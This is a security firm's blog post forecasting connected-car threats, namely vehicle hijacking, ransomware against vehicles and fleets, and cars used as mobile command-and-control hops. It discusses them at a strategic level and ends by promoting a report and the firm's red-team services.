              As vehicles become both increasingly complex and better connected to the Internet, their newfound versatility may be manipulated for malicious purposes. Three of the most concerning potential threats looking ahead to the next few years are those posed by manipulating vehicle operation, ransomware and using vehicular systems as command and control (C2) infrastructure for illicit cyber activity.

              Car Hacking?

              Vehicles have come a long way in terms of the high-tech features and connectivity that come standard in most new models. Modern cars are controlled almost entirely by software, and many drivers don’t realize the most complex digital device they own may be in their driveway. Of the growing number of devices in the “Internet of Things” (IoT), vehicles are among the most significant additions to the global Internet. An ever-growing list of features—including web browsing, Wi-Fi access points, and remote-start mobile phone apps—enhance user enjoyment, but also greatly expand vehicles’ attack surface, rendering them potentially vulnerable to advanced attacks. During the past year especially, numerous proof-of-concept demonstrations have revealed connected-car vulnerabilities that malicious actors can exploit, ranging from unauthorized entry to commandeering the vehicle’s operation. Unfortunately, as consumer demand drives ever more features, the opportunities for compromise will increase as well.

              Ransomware

The scourge of ransomware has so far affected thousands of systems belonging to ordinary individuals, hospitals, and police stations. A vehicle’s increased connectivity, ever-expanding attack surface, and high upfront cost make it an attractive ransomware target. In contrast to ransomware that infects ordinary computer systems, vehicles are more likely susceptible to ransomware attacks when their disablement causes knock-on effects.

              For example, where a single driver might be able to reinstall his car’s software with the help of a mechanic to remedy a ransomware infection, a group of vehicles disabled on a busy highway could cause far more serious disruption. Victims or municipal authorities may have little choice but to pay the ransom to reopen a busy commuting route. Alternatively, a logistics company might suddenly find a large portion of its truck fleet rendered useless by ransomware. The potential for lost revenue due to downtime might pressure the company to pay the ransom rather than risk more significant financial losses.

              Malicious C2 and Final Hop Points

              One effective law enforcement tactic in countering cyber espionage and criminal campaigns is identifying, locating and seizing the systems threat actors use to route malicious traffic through the Internet. Since many modern vehicles can be better described as a computer attached to four wheels and an engine, their mobility and power present challenges to this means of countering threat activity. We have already witnessed malware designed to hijack IoT devices for malicious purposes; vehicular systems’ greater computing power, compared to connected home thermostats, can significantly enhance their value as a C2 node.

              Locating vehicles used to route malicious traffic would present a major challenge to law enforcement investigation, largely due to their mobility. We have not yet observed threat actors using connected vehicle systems to route malicious traffic, but it is most likely that a vehicle would be used as a final hop point to the intended target network. The perpetrators may use the vehicle only once, choosing to hijack the connectivity of a different vehicle on their next operation, and so on. This ever-changing roster of potential last-hop nodes situated on highly mobile platforms may allow threat actors to elude law enforcement for extended periods of time.

              Understanding the Risk Landscape

              The impact of cyber threats is most often considered in financial terms—the cost of a breach, whether direct financial losses or indirect costs of investigation, remediation, and improved security. As computers increasingly control vehicles, among other critical devices and systems, the potential for malfunction or manipulation that causes human harm rises dramatically. Automobile manufacturers may face greater liability, not only for the car’s physical components, but its software as well. How long before vehicles need a “cyber security rating,” similar to that awarded for crash testing and fuel economy?

              These new risks point to the need for automotive manufacturers and suppliers to not only ensure the traditional operational safety of their vehicles, but to also secure both the vehicle's operations and occupant privacy. This requires an ongoing understanding about the nature of threats and vulnerabilities in a rapidly evolving landscape, and building in strong proactive security measures to protect against these risks. FireEye explores these risks to automotive safety in our latest FireEye iSIGHT Intelligence and Mandiant Consulting report: Connected Cars: The Open Road for Hackers. The report is available for download here.

              FireEye Capabilities

FireEye combines our industry-leading threat intelligence, incident response and red team capabilities with our ICS domain expertise to help the automotive industry improve its prevention, detection and response capabilities. FireEye’s Red Team Operations and Penetration Tests can provide firms in the automotive industry experience responding to real-world attacks without the risk of negative headlines. A one-time risk assessment is not enough, because threat actors are constantly evolving.

              For more information, contact FireEye.

              FireEye iSIGHT Intelligence’s Horizons Team conducts strategic forecasting to anticipate risks posed by emerging technologies and geopolitical developments, helping clients and the public better assess their exposure to a dynamic cyber threat landscape.
